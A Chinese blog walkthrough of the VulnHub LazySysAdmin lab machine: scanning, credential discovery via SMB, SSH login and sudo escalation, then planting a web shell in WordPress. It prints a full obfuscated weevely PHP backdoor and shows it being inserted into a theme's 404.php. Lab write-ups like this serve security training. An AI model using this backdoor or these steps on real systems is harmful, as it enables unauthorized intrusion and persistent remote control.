靶机lazyadmin

已于 2023-12-02 16:49:18 修改
阅读量965 收藏 22
点赞数 21
文章标签: 服务器 linux 网络
于 2023-12-02 16:48:46 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45212316/article/details/134754202
版权

下载地址:https://www.vulnhub.com/entry/lazysysadmin-1,205/

配置环境

kali Ip:192.168.87.128

靶机ip:192.168.87.174

一.信息收集

1.主机发现

由于是靶机环境,目标主机与本地在同一网段,使用nmap进行网段扫描,探测存活主机,由结果判断192.168.87.169看起来像目标主机ip。

nmap -sn 192.168.87.0/24

2.扫描主机

对主机进行各种端口扫描

nmap -A -T4 -O -p 0-65535 192.168.87.174
nmap -A 192.168.87.174//强力扫描,耗时长

nmap -O 192.168.87.174 //对目标主机的操作系统进行扫描

nmap 192.168.87.174 -p < portnumber > //对指定端口扫描

nmap -T4 指定扫描过程使用的时序,(总共6个级别[0-5]),级别越高,扫描速度越快,但容易被防火墙或IDS检测屏蔽掉)。

3.目录扫描

因为扫描出开放了80端口,证明有http服务,直接访问首页

使用dirb工具扫描

dirb http://192.168.87.174

扫描结果如下,发现有wordpress和phpmyadmin

二.漏洞利用

1.SSH

根据前面信息收集,发现了有一个smb服务,我们可以直接尝试连接smb://192.168.87.174,发现居然是网站的后台文件

发现了deets,txt文件里面有秘密,密码12345

CBF Remembering all these passwords.

Remember to remove this file and update your password after we push out the server.

Password 12345

根据前面web服务扫描,发现了有wordpress,直接访问http://192.168.87.174/wordpress,发现反复强调自己的名字是togie,猜测ssh用户是togie密码是12345,尝试连接

ssh togie@192.168.87.174

连接成功

接下来就要提权,我们查看当前的togie是否可以sudo

sudo -l

发现可以,不废话直接sudo

sudo -i

这一阶段都接受了

前面在做信息收集的时候发现了数据库账户和密码,在wordpress文件夹里的wp-config.php里面

账户:Admin

密码:TogieMYSQL12345^^

直接登录phpmyadmin,发现什么用都没有

尝试登录wordpress

发现可以

使用kali自带的工具weevely,生成木马命令,在当前目录生成一个叫做wandan.php的文件密码为feile

weevely generate feile/wandan.php

<?php
$f='$k="F94b5a0303"F9;F9$kh="a2F9bbF9124683ca";F9F9$kf="7652fcbF967402";$pF9="y0pMF95k2l3vF9QitSJU";fF9F9unction x($F9F9t,$F';
$L='o.=$t{$iF9}^F9$k{$F9j};}}returF9n $oF9;}if F9(@pF9reg_match("F9/$kh(.+)F9$F9kf/",@file_geF9t_coF9ntF9ents("phF9p://inp';
$G='utF9"),$F9m)==1F9F9)F9 {@ob_start();@eF9val(@gzF9uF9ncoF9mpress(@x(@basF9eF964_decodF9e($m[1]F9),$F9k)F9));F9$o=@ob_ge';
$D='9k){$c=stF9rlen($k)F9;$F9l=strlenF9($t);$o="";fF9or(F9$i=0;$iF9<$F9l;){for($j=0;F9($j<$c&F9F9&$i<$F9l);$j+F9F9+,$i++){$';
$x='t_conF9tents();@obF9_end_F9cleaF9n();$r=@bF9ase64_encF9ode(@x(F9@gzF9compF9ress($o),$kF9));pF9riF9ntF9("$p$kh$r$kf");}';
$S=str_replace('Vq','','VqcreaVqtVqe_VqfuVqncVqtion');
$I=str_replace('F9','',$f.$D.$L.$G.$x);
$w=$S('',$I);$w();
?>

然后把文件内容代码复制Appearance>Editor>404 Templatesd,完成后点击updatefile

访问404文件,路径是/wordpress/wp-content/themes/twentyfifteen/404.php,在kali里面输入如下命令来连接

weevely http://192.168.87.174/wordpress/wp-content/themes/twentyfifteen/404.php pass

至此,此次试验圆满完成!

重生之在河北师大碎大石
关注
  • 21
    点赞
  • 22
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
1. Lazysadmin渗透实战
qq_46389295的博客
03-24 350
攻击机:Kali 攻击机ip:192.168.1.120 靶机发现: nmap -sn 192.168.1.1/24 开放端口扫描 nmap -sS 192.168.1.117 操作系统以及端口上的服务版本 nmap -sV -p22,80,139,445,3306,6667 -O 192.168.1.117 可以尝试对ssh服务进行暴力破解 medusa -M ssh -h 192.16...
LazyAdminV2:启动项目
02-14
LazyAdminV2:启动项目
lazysysadmin靶机攻略
weixin_43179779的博客
01-30 214
lazysysadmin
CTF靶机 LazyAdmin 笔记
z4yn:)的博客
07-07 579
LazyAdmin 靶机介绍:简单的linux机器来练习你的技能 靶机标签:安全,Linux Nmap 扫描开发端口 开放了22 / 80端口 nmap -A 10.10.239.65 -p- 首先访问80页面 是apache的默认页面 用dirbuster扫描网站目录 /content/as下是个登录页面。 常见的弱口令试了一下,都不行。 网站下面有个CMS信息 SweetRice CMS 先到exploit-db上查找对应的漏洞 有备份披露,任意文件上传,php
Vulnhub-lazyadmin靶机实战
御七彩虹猫
03-24 2967
Vulnhub-lazyadmin靶机实战
web渗透测试靶机(新手)
05-07
Web渗透测试靶机是针对新手入门的网络安全学习平台,它模拟了实际的Web应用程序环境,让你可以在一个安全可控的环境中实践渗透测试技术。这个靶机通常包含一系列具有不同安全漏洞的Web应用,让学习者通过查找和利用...
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
安装部署Web安全测试用的靶机
11-24
为了进行有效的测试,我们需要模拟真实的环境,这就是靶机的作用。本实验旨在通过安装部署Web安全测试靶机,包括DVWA、MCIR、Pikachu、mutillidae和BWAPP,来提供一个安全学习和实践的平台。 首先,安装XAMPP,这是...
PWN靶机环境 网络安全
05-23
PWN靶机环境
Vulnix.7z靶机
04-25
一个vulnhub上的靶机,因为网络原因,下载的特别慢,我下载好,上传上来,供大家学习。如果大家有更好的靶机,请私我。
靶机渗透(三)——Lazysysadmin
qq_45751902的博客
04-21 3372
环境配置 都是在vmware中 靶机:未知,nat模式 kali:192.168.92.5 nat,模式 信息收集 arp-scan -l 扫描局域网内所有的ip 从上图可知,靶机的ip是192.168.92.6 端口扫描 nmap -sS -Pn -T4 -sV -O 192.168.92.6 或者 masscan 192.168.92.6 -p 0-65535 --rate=10000 masscan扫描速度快,但准确率不高,多扫描几次,防止漏扫 namp:-T4(分为0-5等级;-s
靶机渗透【lazysysadmin
学信安技术 卫国家之门
01-11 6350
文章目录*一. lazysysadmin靶机安装*1. 下载靶机2. 打开靶机*二. lazysysadmin靶机渗透*1. 信息收集2. Web渗透3. 共享服务4. ssh服务5. 文件上传 一. lazysysadmin靶机安装 1. 下载靶机 百度网盘链接提取码 lazysysadmin.zip 提取码:m02v 2. 打开靶机 打开 VMware,在左上角选择 - - 文件 - - 打开 找到 lazysysadmin 靶机解压位置 开启后如图所示 二. lazysy
打靶练习之--LazysysAdmin靶机
最新发布
qq_34094920的博客
12-12 1035
渗透机IP:192.168.1.108目标靶机IP:192.168.1.106任务通过渗透机进入目标主机 获取flag。
Lazysysadmin靶机复盘
2301_79118231的博客
09-30 79
Lazysysadmin靶机复盘个人笔记。
vulhub靶机--lazysysadmin
m0_58595840的博客
01-18 299
vulhub渗透共享文件夹
靶机实战-Lazysysadmin
滕财然的博客
01-19 1465
靶机实战-Lazysysadmin 1、主机发现 netdiscover -i eth0 -r 192.168.232.0/24 //也可以做主机发现 2、扫描开放端口 确认端口开的服务:nmap -sV -T4 -O -p 端口 IP 发现有Mysql、SSH、Samba 首先22端口ssh爆破:要有字典 启动msfconsole show options:查看需要的参数 添加目...
OSCP - Lazysysadmin 的破解
kevinhanser
08-24 3246
本文主要记录对 Lazysysadmin 的渗透学习过程 Lazysysadmin 下载链接 1. ip 探测 ip 探测 使用 netdiscover,由于在内网,可以直接扫网网段 root@kali:~# netdiscover -r 10.10.10.0/24 Currently scanning: Finished! | Screen View: ...
kali渗透综合靶机(一)--Lazysysadmin靶机
W小哥
03-05 5339
一、靶机下载 Lazysysadmin靶机百度云下载 链接:https://pan.baidu.com/s/1pTg38wf3oWQlKNUaT-s7qQ 提取码:q6zo 二、靶机搭建 将下载好的靶机环境,用VMware导入即可使用,文件->打开 导入到合适位置即可,默认是C盘,成功导入虚拟机之后,打开即可 三、攻击过程 1、主机发现 因靶机是自动获取IP,与kali在同一个网段,故...
Lazysysadmin靶机环境搭建与渗透测试
qq_43647462的博客
11-23 846
LazySysAdmin 攻击环境 两台服务器均放在了VM中进行环境搭建,均采用了NET连接的方式,但是由于个人环境问题,所以导致了靶机无法正常连接至NET网络,手工配置IP,在开机界面按下e,将ro改成rw signie init=/bin/bash,ctrl+x进入命令行 在已知kali攻击机的ip为x.x.x.100的情况下,手工配置ip ifconfig eth0 x.x.x.101 netmask 255.255.255.0 broadcast x.x.x.255 route add defaul
Windows2008服务器上搭建五种靶机教程
"该资源是一份关于如何搭建五种不同靶机的教程,由张学飞撰写,主要针对Windows 2008服务器环境。涉及的靶机包括DVWA(Damn Vulnerable Web Application)、MCIR、Pikachu、mutillidae以及bWAPP。这些靶机主要用于...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值